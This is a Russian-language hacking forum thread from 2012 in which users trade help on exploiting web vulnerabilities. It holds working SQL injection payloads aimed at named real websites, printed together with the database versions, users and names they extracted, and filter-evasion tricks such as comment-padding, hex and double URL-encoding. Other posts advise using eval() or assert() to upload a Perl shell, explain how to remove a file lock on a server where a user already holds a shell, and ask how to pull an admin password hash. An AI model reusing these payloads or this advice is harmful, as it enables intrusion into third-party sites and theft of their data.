Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pvitalik80

    pvitalik80 New Member

    Joined:
    22 Sep 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    PHP:
    if (is_file($_GET['cfg']) and dirname($_GET['cfg'])=='.' )
           
    $_SESSION['configfile']=$_GET['cfg'];
    else 
           
    $_SESSION['configfile']="cryptographp.cfg.php";

    include(
    $_SESSION['configfile']);   
    Реально ли это как-то раскрутить? :)
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Фильтруется вообще куча всего, проще перечислить что не фильтруется =)

    (substring кстати фильтруется тоже, чего не скажешь о substr)

    Но тем не менее...

    Для вывода версии юзал так

    Code:
    http://neoncolor.ru/catalog/?s=2&gr=642+and+ascii(lower(substr(@@version,1,1)))=53
    Ну или более экзотический вариант

    Code:
    ttp://neoncolor.ru/catalog/?s=2&gr=642+and+right(left(@@version,1),1)=5
    Version = 5.0.77

    @@user и user() фильтруется, точно также обстоит дело и с именами БД.

    Абсолютно солидарен с товарищем - перед слепой инъекцией не поленитесь проверить с какой СУБД имеем дело, например руководствуясь уникальными функциями каждой СУБД этого поста

    тут дело обстоит намного проще - фильтруется пробелы - юзай /**/

    Code:
    http://xao.ru/review'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1
    Duplicate entry '5.0.77-log' for key 1

    User = 'cl61392_xaoruweb@localhost'
    Database = 'cl61392_xaoruweb'


    Прикольная скуля, не сразу додумался в каком параметре искать... Хоть бы указал...

    Ну вот держи вектор атаки

    Code:
    http://oring.com.ua/products/uponor-wirsbo/truba1.php'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1
    Duplicate entry '4.1.21-standard' for key 1

    Version = 4.1.21-standard
    User = oring_com_ua@localhost
    Database = oring_com_ua


    Дальше сам справишься?)
     
    _________________________
    #21102 BigBear, 25 Sep 2012
    Last edited: 25 Sep 2012
    5 people like this.
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Небольшое дополнение. Вынесу в отдельный пост, а то предыдущий длиннопост и так сложен для восприятия.
    Надеюсь, модераторы не осерчают... =)

    Не давала покоя скуля, была идея проверить на магические кавычки, вдруг получится шелл залить...

    Code:
    http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF('123'=123,1,0)  FALSE
    
    http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF(123=123,1,0)  TRUE
    Как видишь, облом.

    Так что, ИМХО, на сайт можно забить...
     
    _________________________
  4. Rifes

    Rifes Banned

    Joined:
    20 Sep 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Что можно выжать из этого ?
    Code:
    http://kb.8day.ru/objects.php?serv=1&it=W'
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Не более чем раскрытие путей. Инъекции я тут не увидел.
     
    _________________________
    1 person likes this.
  6. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    Скорее нет чем да, инклудить можно только из текущей папки.
     
  7. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Code:
    Disabled PHP Functions: apache_setenv, chown, chgrp, closelog, define_syslog_variables, dl, exec, ftp_exec, openlog, passthru, pcntl_exec, popen, posix_getegid, posix_geteuid, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_open, proc_terminate, shell_exec, syslog, system
    какие еще функции есть которые выполняяют системные команды?
     
  8. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Это необходимо смотреть по функциям и классам, доступным на данном сервере вычитая из них всё заблокированное и бесполезное. Такие вопросы обычно решаются индивидуально т.к. сложно дать ответ не имея полного представления о сервере.

    UDP. Всю необходимую информацию можно получить с помощью get_defined_functions(), get_defined_vars(), get_defined_constants() и get_declared_classes().
     
    #21108 randman, 27 Sep 2012
    Last edited: 27 Sep 2012
  9. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    какие данные предоставить о системе ?
     
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    blesse, ну у вас хотя бы нет в списке eval() и assert() . Можете через них свободно работать, залить через них Perl Shell (PPS 1.0) и дальше можете плевать на все эти ограничения т.к. Ваш список применим только к РНР файлам!
     
    1 person likes this.
  11. Semer

    Semer New Member

    Joined:
    26 Sep 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    =-1+union+select+1,COLUMN_NAME,3,4+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME=%22Users%22

    есть такой запрос к базе.
    Users должно быть в одинарных кавычках? Одинарные кавычки заменяются на %22, есть другой способ?
     
    #21111 Semer, 27 Sep 2012
    Last edited: 27 Sep 2012
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    переведи users в ХЕКС значение, в твоем случае оно равняется 0x7573657273
    т.е твои запрос будет выглядеть так:
     
    _________________________
    #21112 winstrool, 27 Sep 2012
    Last edited: 27 Sep 2012
  13. shumaher

    shumaher New Member

    Joined:
    16 Feb 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Вопрос по sql inj

    Делаю запрос:
    redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9 --+
    говорит что нужно продолжить подбирать количество столбцов
    ок. уже посылаю такой запрос redirect.php?lid=' union select 1,2,3,4,5,6,7,8,9,10 --+
    нарушен синтаксис и выдает:
    Как правильно составить запрос? прощу помощи. Думаю сайт светить не обязательно. я просто тренируюсь, потом админов оповещу.
     
    #21113 shumaher, 28 Sep 2012
    Last edited: 28 Sep 2012
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Думаю проблема или в пробеле (что навряд ли), при условии что ты нашёл инъекцию в строковой переменной.

    тогда попробуй запросы

    Code:
    id=1'/**/and/**/1='1
    id=1'/**/and/**/1='2
    Если результаты будут отличаться - фильтруется пробел

    Ещё возможно что ты ковыряешь целочисленную перменную, тогда попробуй так

    Code:
    id=1/**/and/**/1=1
    id=1/**/and/**/1=2
    Если страницы отличаются - это твой случай

    Перед использованием order by не грешно было бы проверить какого типа переменная перед тобой

    id='/**/and/**/1=1/**/order/**/by/**/100+--+

    или

    id='/**/order/**/by/**/'100

    выплюнет что столбцов много - у тебя переменная строкового типа

    id=/**/and/**/1=1/**/order/**/by/**/100+--+

    соответственно аналог

    id/**/order/**/by/**/100

    выплюнет что столбцов много - у тебя переменная целочисленного типа

    З.Ы. А вообще это заезженная тема, гораздо приятнее работать не с теорией а практикой. Так что прошу по возможности выкладывать сюда сайты, вызывающие проблемы.

    З.Ы.Ы. не поленись почитать это
     
    _________________________
  15. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    30
    Likes Received:
    7
    Reputations:
    0
    Вообщем такая проблема, есть шелл права везде зелёные, но когда правишь любой файл он не сохраняется и даже удалить ничего нельзя, раньше было всё как обычно, но злобный админ что-то сделал что теперь я не могу ничего править и удалять, а только заливать а в шелле права сами зелёные, что мог натворить админ?
     
  16. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    в sql инъекции не проходит точка .
    то есть не могу достать имена из schema.tables
    есть варианты?
    И еще если пишу + from xxx то добовляет префикс
    aaa.xxx
     
    #21116 RazyKK, 29 Sep 2012
    Last edited: 29 Sep 2012
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    seozone, сделайте lsattr <имя файла> и смотрите параметр -i. Есди он стоит, то это и запрещает Вам редактирование!
    Если он есть, то можно попробовать снять, если конечно прав хватит!
    Code:
    chattr -i /etc/lilo.conf
     
    1 person likes this.
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    вместо точки попробуй url=кодированоое значение точки - %2e

    Хотя был случай. когда фильтровалось обычное url кодирование, но не фильтровалось двойной url-кодирование. Для точки это значение %252e

    from+information_schema%2etables
    from+information_schema%252etables

    А префикс добавляет потому что ищет таблицу в текущей БД.

    Полный запрос должен быть вида from+`database`.`table1`
     
    _________________________
  19. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    нет, всеравно фильтрует. попробовал char и hex -ошибка.
    Может можно через where и like запрос сделать без точки?
     
  20. [c0de]

    [c0de] New Member

    Joined:
    21 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Есть слепая blind sql инъекция
    Проверил
    test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
    test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
    Известно название таблицы, полей
    Так же известно название таблицы с юзерами "users_am"
    и наличие полей "id" , "login", "password"
    Известен id и логин админа
    Возникает вопрос, как достать хэш пароля?
    в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.
     
Thread Status:
Not open for further replies.